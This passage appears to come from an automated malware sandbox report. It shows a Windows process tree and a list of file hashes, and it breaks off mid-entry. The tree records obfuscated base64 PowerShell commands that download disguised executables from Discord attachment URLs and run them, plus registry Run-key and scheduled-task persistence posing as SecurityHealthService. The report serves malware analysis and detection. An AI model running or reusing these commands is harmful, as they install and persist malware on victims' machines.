                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 808
                                            10⤵
                                            • Program crash
                                            PID:2808
                                  • C:\Windows\system32\cmd.exe
                                    "cmd" /C C:\Users\Admin\AppData\Local\Temp\0yebscntCh.exe
                                    6⤵
                                      PID:4092
                                      • C:\Users\Admin\AppData\Local\Temp\0yebscntCh.exe
                                        C:\Users\Admin\AppData\Local\Temp\0yebscntCh.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        PID:2344
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAYQB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADkANgA4ADUANwA5ADQANgAxADMAMgAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGUAawB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABjAGwAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwB1AGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOQAuAGUAeABlACcAKQApADwAIwB2AHoAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AGsAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZAByAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOQAuAGUAeABlACcAKQA8ACMAcQBnAGIAIwA+AA=="
                                          8⤵
                                          • Blocklisted process makes network request
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1420
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            9⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:2204
                                          • C:\Users\Admin\AppData\Roaming\9.exe
                                            "C:\Users\Admin\AppData\Roaming\9.exe"
                                            9⤵
                                            • Executes dropped EXE
                                            PID:3552
                                    • C:\Windows\system32\cmd.exe
                                      "cmd" /C C:\Users\Admin\AppData\Local\Temp\ZA0cAIjiEL.exe
                                      6⤵
                                        PID:2064
                                        • C:\Users\Admin\AppData\Local\Temp\ZA0cAIjiEL.exe
                                          C:\Users\Admin\AppData\Local\Temp\ZA0cAIjiEL.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          PID:3144
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAZABoACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA2ADcANAA3ADkAMQA1ADMANgA4ADQANwA4ADcAMwA2ADEALwAxADAANgA3ADQANwA5ADUAMAA3ADUANQA4ADIAMQA1ADYAOAAwAC8AcABsAGwAbQBtAGQAaQBpAHAAbQAuAGUAeABlACcALAAgADwAIwB3AHoAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAcAB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAYQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEAMgAuAGUAeABlACcAKQApADwAIwBmAHQAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBlAGIAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdAB0AHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAyAC4AZQB4AGUAJwApADwAIwBtAHMAdAAjAD4A"
                                            8⤵
                                            • Blocklisted process makes network request
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4900
                                            • C:\Users\Admin\AppData\Roaming\12.exe
                                              "C:\Users\Admin\AppData\Roaming\12.exe"
                                              9⤵
                                              • Executes dropped EXE
                                              PID:3092
                                      • C:\Windows\system32\cmd.exe
                                        "cmd" /C C:\Users\Admin\AppData\Local\Temp\Ip4cye0MVd.exe
                                        6⤵
                                          PID:3812
                                        • C:\Windows\system32\cmd.exe
                                          "cmd" /C C:\Users\Admin\AppData\Local\Temp\gmjxnZ8qD1.exe
                                          6⤵
                                            PID:4836
                                          • C:\Windows\system32\cmd.exe
                                            "cmd" /C C:\Users\Admin\AppData\Local\Temp\cPStMPGyex.exe
                                            6⤵
                                              PID:4620
                                  • C:\Windows\system32\OpenWith.exe
                                    C:\Windows\system32\OpenWith.exe -Embedding
                                    1⤵
                                    • Modifies registry class
                                    • Suspicious use of SetWindowsHookEx
                                    PID:4856
                                  • C:\Users\Admin\AppData\Local\Temp\gmjxnZ8qD1.exe
                                    C:\Users\Admin\AppData\Local\Temp\gmjxnZ8qD1.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    PID:4436
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAaABsACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQA0ADEAMwA5ADQANQA1ADMAMgA1ADAANgAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAHIAdwB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZABmAHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBuAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAwAC4AZQB4AGUAJwApACkAPAAjAHQAZgBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHUAaQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGwAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxADAALgBlAHgAZQAnACkAPAAjAHAAawBqACMAPgA="
                                      2⤵
                                      • Blocklisted process makes network request
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4888
                                      • C:\Users\Admin\AppData\Roaming\10.exe
                                        "C:\Users\Admin\AppData\Roaming\10.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:4736
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
                                          4⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2916
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                          4⤵
                                            PID:4780
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                              5⤵
                                              • Creates scheduled task(s)
                                              PID:2228
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            #cmd
                                            4⤵
                                              PID:1408
                                      • C:\Users\Admin\AppData\Local\Temp\Ip4cye0MVd.exe
                                        C:\Users\Admin\AppData\Local\Temp\Ip4cye0MVd.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        PID:3616
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAZAB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADIANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA2ADcANAA3ADkAMQA1ADMANgA4ADQANwA4ADcAMwA2ADEALwAxADAANgA3ADQANwA5ADUAMAA3ADkAMQAwADUAMwAzADEAMwAxAC8AQwBSAC4AZQB4AGUAJwAsACAAPAAjAGEAcQB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZwBmAHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcwBkAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAzAC4AZQB4AGUAJwApACkAPAAjAGoAbQBiACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGUAcQBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB0AGQAZgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxADMALgBlAHgAZQAnACkAPAAjAHoAegBsACMAPgA="
                                          2⤵
                                          • Blocklisted process makes network request
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3872
                                      • C:\Users\Admin\AppData\Local\Temp\cPStMPGyex.exe
                                        C:\Users\Admin\AppData\Local\Temp\cPStMPGyex.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        • Suspicious use of WriteProcessMemory
                                        PID:4384
                                      • C:\Windows\servicing\TrustedInstaller.exe
                                        C:\Windows\servicing\TrustedInstaller.exe
                                        1⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2432
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4828 -ip 4828
                                        1⤵
                                          PID:1424
                                        • C:\Users\Admin\AppData\Roaming\3.exe
                                          C:\Users\Admin\AppData\Roaming\3.exe
                                          1⤵
                                          • Executes dropped EXE
                                          PID:2352

                                        Network

                                        MITRE ATT&CK Enterprise v6

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                          Filesize

                                          3KB

                                          MD5

                                          556084f2c6d459c116a69d6fedcc4105

                                          SHA1

                                          633e89b9a1e77942d822d14de6708430a3944dbc

                                          SHA256

                                          88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

                                          SHA512

                                          0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\5.exe.log

                                          Filesize

                                          1KB

                                          MD5

                                          8ec831f3e3a3f77e4a7b9cd32b48384c

                                          SHA1

                                          d83f09fd87c5bd86e045873c231c14836e76a05c

                                          SHA256

                                          7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982

                                          SHA512

                                          26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                          Filesize

                                          425B

                                          MD5

                                          4eaca4566b22b01cd3bc115b9b0b2196

                                          SHA1

                                          e743e0792c19f71740416e7b3c061d9f1336bf94

                                          SHA256

                                          34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

                                          SHA512

                                          bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                          Filesize

                                          2KB

                                          MD5

                                          fb1df442f2cee34456c6ed9064318559

                                          SHA1

                                          729e8f61f181b303d25e1f709399db242d82c6c2

                                          SHA256

                                          75207b26127c0778928b2c0ce51d371a1b4f5a4c47596902f88dbff9ddd16a79

                                          SHA512

                                          d6df1b8e17733d65ae332d20a22fcbc2cdec8df38a705b694b4d87b2f0c9c287378791c3da2cb2142e95f31df1b4209e01a17a83eabfcb2175f38a9207ad0294

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          c0e624cf245f9363d0cc7546d3436f61

                                          SHA1

                                          633c60b7f774ba00dccd0085d8bf0ee4dc669e31

                                          SHA256

                                          daec689334fd19f5449c882be39a49a2c93defbd0890ee7094034dfd7bc339d3

                                          SHA512

                                          d53194b38409ad1cd55f0811d244598c96bd1a4061079b0ca4568d08aed1bdd340e9c216bda1ee94a6a7f68082458ceaedff5303869ffc0bd08cda8f045e641a

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          affb533afd518ad343800a0868062ca7

                                          SHA1

                                          795af694569e97c942fc8184eb31a01ffb2354ad

                                          SHA256

                                          858a2981f5a31384edc5c0a8c3fd24d2bc60a1f4cbb822a6ced7e0e7eaeea0aa

                                          SHA512

                                          6b79dde0e93bfb9ed9ed7287a92b56697f325fc05965121020644b4e5b245861c323c59c1076ff1380b36c61a7f13e53993febba6ddf7700103685b094ec9b00

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          b6500224947206fab25690397fca489e

                                          SHA1

                                          8f61dd35d00c5dcc990fb2840982841545b2d953

                                          SHA256

                                          846cfb9b39e1690ee4146c9cfa9d791c3a42c72c4ae547a07b3ff8f0f5d1865b

                                          SHA512

                                          aa4775f7c905c3543632d7d49703ff744a10be5a22097d358629666f42b20873ad063ec24d54e65de731b6830cf4bbe365121f43040dbb209b27c01ffbad8112

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          b6500224947206fab25690397fca489e

                                          SHA1

                                          8f61dd35d00c5dcc990fb2840982841545b2d953

                                          SHA256

                                          846cfb9b39e1690ee4146c9cfa9d791c3a42c72c4ae547a07b3ff8f0f5d1865b

                                          SHA512

                                          aa4775f7c905c3543632d7d49703ff744a10be5a22097d358629666f42b20873ad063ec24d54e65de731b6830cf4bbe365121f43040dbb209b27c01ffbad8112

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          affb533afd518ad343800a0868062ca7

                                          SHA1

                                          795af694569e97c942fc8184eb31a01ffb2354ad

                                          SHA256

                                          858a2981f5a31384edc5c0a8c3fd24d2bc60a1f4cbb822a6ced7e0e7eaeea0aa

                                          SHA512

                                          6b79dde0e93bfb9ed9ed7287a92b56697f325fc05965121020644b4e5b245861c323c59c1076ff1380b36c61a7f13e53993febba6ddf7700103685b094ec9b00

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          b6500224947206fab25690397fca489e

                                          SHA1

                                          8f61dd35d00c5dcc990fb2840982841545b2d953

                                          SHA256

                                          846cfb9b39e1690ee4146c9cfa9d791c3a42c72c4ae547a07b3ff8f0f5d1865b

                                          SHA512

                                          aa4775f7c905c3543632d7d49703ff744a10be5a22097d358629666f42b20873ad063ec24d54e65de731b6830cf4bbe365121f43040dbb209b27c01ffbad8112

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          6b33cff2c64571ee8b1cf14f157f317f

                                          SHA1

                                          ae4426839f5e8c28e8ac6d09b5499d1deda33fd2

                                          SHA256

                                          0381f2b66fae947afa407755ca58105879f85411d9a78b99774059f982ee3619

                                          SHA512

                                          61110504890848c0f2cff028a9f726445d5d63221bade9d3e801527483d29f9730051b10bdd5fa4b454cb40af130989c1aca3a123b5fe7ae665f3ee18c4fa2c2

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          6b33cff2c64571ee8b1cf14f157f317f

                                          SHA1

                                          ae4426839f5e8c28e8ac6d09b5499d1deda33fd2

                                          SHA256

                                          0381f2b66fae947afa407755ca58105879f85411d9a78b99774059f982ee3619

                                          SHA512

                                          61110504890848c0f2cff028a9f726445d5d63221bade9d3e801527483d29f9730051b10bdd5fa4b454cb40af130989c1aca3a123b5fe7ae665f3ee18c4fa2c2

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          c0e624cf245f9363d0cc7546d3436f61

                                          SHA1

                                          633c60b7f774ba00dccd0085d8bf0ee4dc669e31

                                          SHA256

                                          daec689334fd19f5449c882be39a49a2c93defbd0890ee7094034dfd7bc339d3

                                          SHA512

                                          d53194b38409ad1cd55f0811d244598c96bd1a4061079b0ca4568d08aed1bdd340e9c216bda1ee94a6a7f68082458ceaedff5303869ffc0bd08cda8f045e641a

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          027f752ee0cbbc3ac151148c1292faee

                                          SHA1

                                          79a3e6fd6e0a6db95f8d45eb761a629c260f937c

                                          SHA256

                                          0359fc2210c62b1c352b0583904cb485b6310146c4f47b6838b08350bd25a1da

                                          SHA512

                                          0db6ef15ed79c8dea5ab0596c6221b396b63164ba8250c5cab384e4e5664d72108cdc87b0a7318e56a1ed9b99276bf8cc170130bda85c54534f86c6eb2420a97

                                        • C:\Users\Admin\AppData\Local\Temp\0.exe

                                          Filesize

                                          539KB

                                          MD5

                                          1137589aa44bf2facb839b4a4abcb941

                                          SHA1

                                          7f86e36f26d36a2a9e4adac82a29668f8a4aab5c

                                          SHA256

                                          715455aef5e60b76962c64b6a1f1507d07566abc220c624c03b47b90e3cb4921

                                          SHA512

                                          60b9490cbddb1ea965a25ccb2996cde646605b1e05558426f7426cd980710638b690bfe18d5f589c67f881a6ac670b77a57a5dbfc89698cf01ad5711cbbf32ac

                                        • C:\Users\Admin\AppData\Local\Temp\0.exe

                                          Filesize

                                          539KB

                                          MD5

                                          1137589aa44bf2facb839b4a4abcb941

                                          SHA1

                                          7f86e36f26d36a2a9e4adac82a29668f8a4aab5c

                                          SHA256

                                          715455aef5e60b76962c64b6a1f1507d07566abc220c624c03b47b90e3cb4921

                                          SHA512

                                          60b9490cbddb1ea965a25ccb2996cde646605b1e05558426f7426cd980710638b690bfe18d5f589c67f881a6ac670b77a57a5dbfc89698cf01ad5711cbbf32ac

                                        • C:\Users\Admin\AppData\Local\Temp\0yebscntCh.exe

                                          Filesize

                                          6KB

                                          MD5

                                          771d211ebe7494a139f2b76fbe7c3704

                                          SHA1

                                          ce312d13a9962bc458d7dbd226ec30c002b1eaba

                                          SHA256

                                          c7dd78efea30251ec8a5dc9d5ff5ba92dae3771fb4c9cfb0f44a23bdabcaad52

                                          SHA512

                                          9ecbbe1f39549dc8b9c33e1cdd1d1de1629dac5fe0911199490b31acac416b7ebf930f6a84abc6bc0f8bb6b09169aaf2ea4cd6515358943807bb125ac93366cb

                                        • C:\Users\Admin\AppData\Local\Temp\0yebscntCh.exe

                                          Filesize

                                          6KB

                                          MD5

                                          771d211ebe7494a139f2b76fbe7c3704

                                          SHA1

                                          ce312d13a9962bc458d7dbd226ec30c002b1eaba

                                          SHA256

                                          c7dd78efea30251ec8a5dc9d5ff5ba92dae3771fb4c9cfb0f44a23bdabcaad52

                                          SHA512

                                          9ecbbe1f39549dc8b9c33e1cdd1d1de1629dac5fe0911199490b31acac416b7ebf930f6a84abc6bc0f8bb6b09169aaf2ea4cd6515358943807bb125ac93366cb

                                        • C:\Users\Admin\AppData\Local\Temp\CH1cxSaG6k.exe

                                          Filesize

                                          130KB

                                          MD5

                                          5cfc262781b442485c41919bc53cd53b

                                          SHA1

                                          acd6a245a1fd5448bccb7f6874a237146fd934dc

                                          SHA256

                                          b3602a1400182176db1ed1fb4591beda3b478b25e60bf72f5534590f5d69c6ba

                                          SHA512

                                          1705a9d7e33df193a709eda84547c3879276aa238f80bf8422999ec40362bda61d930d8da483e26e52d2061351740581f34703689b057a74ff911cba357fad81

                                        • C:\Users\Admin\AppData\Local\Temp\CH1cxSaG6k.exe

                                          Filesize

                                          130KB

                                          MD5

                                          5cfc262781b442485c41919bc53cd53b

                                          SHA1

                                          acd6a245a1fd5448bccb7f6874a237146fd934dc

                                          SHA256

                                          b3602a1400182176db1ed1fb4591beda3b478b25e60bf72f5534590f5d69c6ba

                                          SHA512

                                          1705a9d7e33df193a709eda84547c3879276aa238f80bf8422999ec40362bda61d930d8da483e26e52d2061351740581f34703689b057a74ff911cba357fad81

                                        • C:\Users\Admin\AppData\Local\Temp\CnzZwjyRSa.exe

                                          Filesize

                                          5KB

                                          MD5

                                          6c15c7029783f0346c38ae0bbc05a841

                                          SHA1

                                          4e83201b3781b180694399dec65870142f2fc510

                                          SHA256

                                          f24ef9d438c83af3a2b6d5499269b56996145bf8ca5c033f2706e236db00dfeb

                                          SHA512

                                          e7f454fe96f15f26b6d6d58cc4ec8e30aa8f72c4914c16559f6dd128d557b287fc2226e7ac87098272eee252a615cc2bf589910b0d29da856bb8927e916e1a7f

                                        • C:\Users\Admin\AppData\Local\Temp\CnzZwjyRSa.exe

                                          Filesize

                                          5KB

                                          MD5

                                          6c15c7029783f0346c38ae0bbc05a841

                                          SHA1

                                          4e83201b3781b180694399dec65870142f2fc510

                                          SHA256

                                          f24ef9d438c83af3a2b6d5499269b56996145bf8ca5c033f2706e236db00dfeb

                                          SHA512

                                          e7f454fe96f15f26b6d6d58cc4ec8e30aa8f72c4914c16559f6dd128d557b287fc2226e7ac87098272eee252a615cc2bf589910b0d29da856bb8927e916e1a7f

                                        • C:\Users\Admin\AppData\Local\Temp\Ip4cye0MVd.exe

                                          Filesize

                                          5KB

                                          MD5

                                          335ebfd3421b0c58c258bbff94fd7f9d

                                          SHA1

                                          164f6cb1b5bc5c0905de512d355363705cd62154

                                          SHA256

                                          02fa44b9687f061867ed258f14e0542ba8c3af5db68f69fda02c94b73cd9568b

                                          SHA512

                                          51714c30b8b9d76cc5e455657d142b31da378d3c244b646ff1d5968b167d9147f37a839076d957395f6fadece78724f5d15694e59eb1d524643e245e4d8cc13e

                                        • C:\Users\Admin\AppData\Local\Temp\Ip4cye0MVd.exe

                                          Filesize

                                          5KB

                                          MD5

                                          335ebfd3421b0c58c258bbff94fd7f9d

                                          SHA1

                                          164f6cb1b5bc5c0905de512d355363705cd62154

                                          SHA256

                                          02fa44b9687f061867ed258f14e0542ba8c3af5db68f69fda02c94b73cd9568b

                                          SHA512

                                          51714c30b8b9d76cc5e455657d142b31da378d3c244b646ff1d5968b167d9147f37a839076d957395f6fadece78724f5d15694e59eb1d524643e245e4d8cc13e

                                        • C:\Users\Admin\AppData\Local\Temp\ZA0cAIjiEL.exe

                                          Filesize

                                          5KB

                                          MD5

                                          ca08a1dbba4869f7aae7b6796d7f82a9

                                          SHA1

                                          db0f37c475147520a9765826d36a326260f1c54b

                                          SHA256

                                          f3276b6406cda3007ac47fa24f240118680df7244e745c3c73cfacc2a9028ead

                                          SHA512

                                          1c6a8af5db29979fe784ca71a3aecaabf5c423a180baf0bb1cb6046e9c843ddf4ab339227fb5d4054618f49792163bba4f07101f3135244c8aaf17a8eb68ce9d

                                        • C:\Users\Admin\AppData\Local\Temp\ZA0cAIjiEL.exe

                                          Filesize

                                          5KB

                                          MD5

                                          ca08a1dbba4869f7aae7b6796d7f82a9

                                          SHA1

                                          db0f37c475147520a9765826d36a326260f1c54b

                                          SHA256

                                          f3276b6406cda3007ac47fa24f240118680df7244e745c3c73cfacc2a9028ead

                                          SHA512

                                          1c6a8af5db29979fe784ca71a3aecaabf5c423a180baf0bb1cb6046e9c843ddf4ab339227fb5d4054618f49792163bba4f07101f3135244c8aaf17a8eb68ce9d

                                        • C:\Users\Admin\AppData\Local\Temp\cPStMPGyex.exe

                                          Filesize

                                          5KB

                                          MD5

                                          fea013218944957fc9af744b5d833604

                                          SHA1

                                          402b3a6a1284d8cf2b0e11525b53f60d2fa602fa

                                          SHA256

                                          bfb525f063e2332edf29c33912de7619ac58916e9935c11bf568b534ef1a46b3

                                          SHA512

                                          59ac1511166e60840f46f2f747f0a3a4d4421653cc9ade60dbcc589e1e6414487672b9d0d9a127b2b206bb5b5891c7991f8f66def799af444f88c8ce3178f80f

                                        • C:\Users\Admin\AppData\Local\Temp\cPStMPGyex.exe

                                          Filesize

                                          5KB

                                          MD5

                                          fea013218944957fc9af744b5d833604

                                          SHA1

                                          402b3a6a1284d8cf2b0e11525b53f60d2fa602fa

                                          SHA256

                                          bfb525f063e2332edf29c33912de7619ac58916e9935c11bf568b534ef1a46b3

                                          SHA512

                                          59ac1511166e60840f46f2f747f0a3a4d4421653cc9ade60dbcc589e1e6414487672b9d0d9a127b2b206bb5b5891c7991f8f66def799af444f88c8ce3178f80f

                                        • C:\Users\Admin\AppData\Local\Temp\cpFkbB2rR8.exe

                                          Filesize

                                          5KB

                                          MD5

                                          cfe54df026f15a3afecaeb31546d09a3

                                          SHA1

                                          c216942558e5395b08f0a7f817c90f95f5076f9a

                                          SHA256

                                          df830796a1716f2279da6702738ebcbfcb9b0127a7ac2d63d4cd1a8c6547e031

                                          SHA512

                                          1c5e518ac14fd61ddd191034f69f39a28cfe02b7c3fbd184f8df6a3451fb92c9dad542c83b6e7b1a88b16b53a265c0446bb3b4f08c8f2f9262bcc008d4b8e5c6

                                        • C:\Users\Admin\AppData\Local\Temp\cpFkbB2rR8.exe

                                          Filesize

                                          5KB

                                          MD5

                                          cfe54df026f15a3afecaeb31546d09a3

                                          SHA1

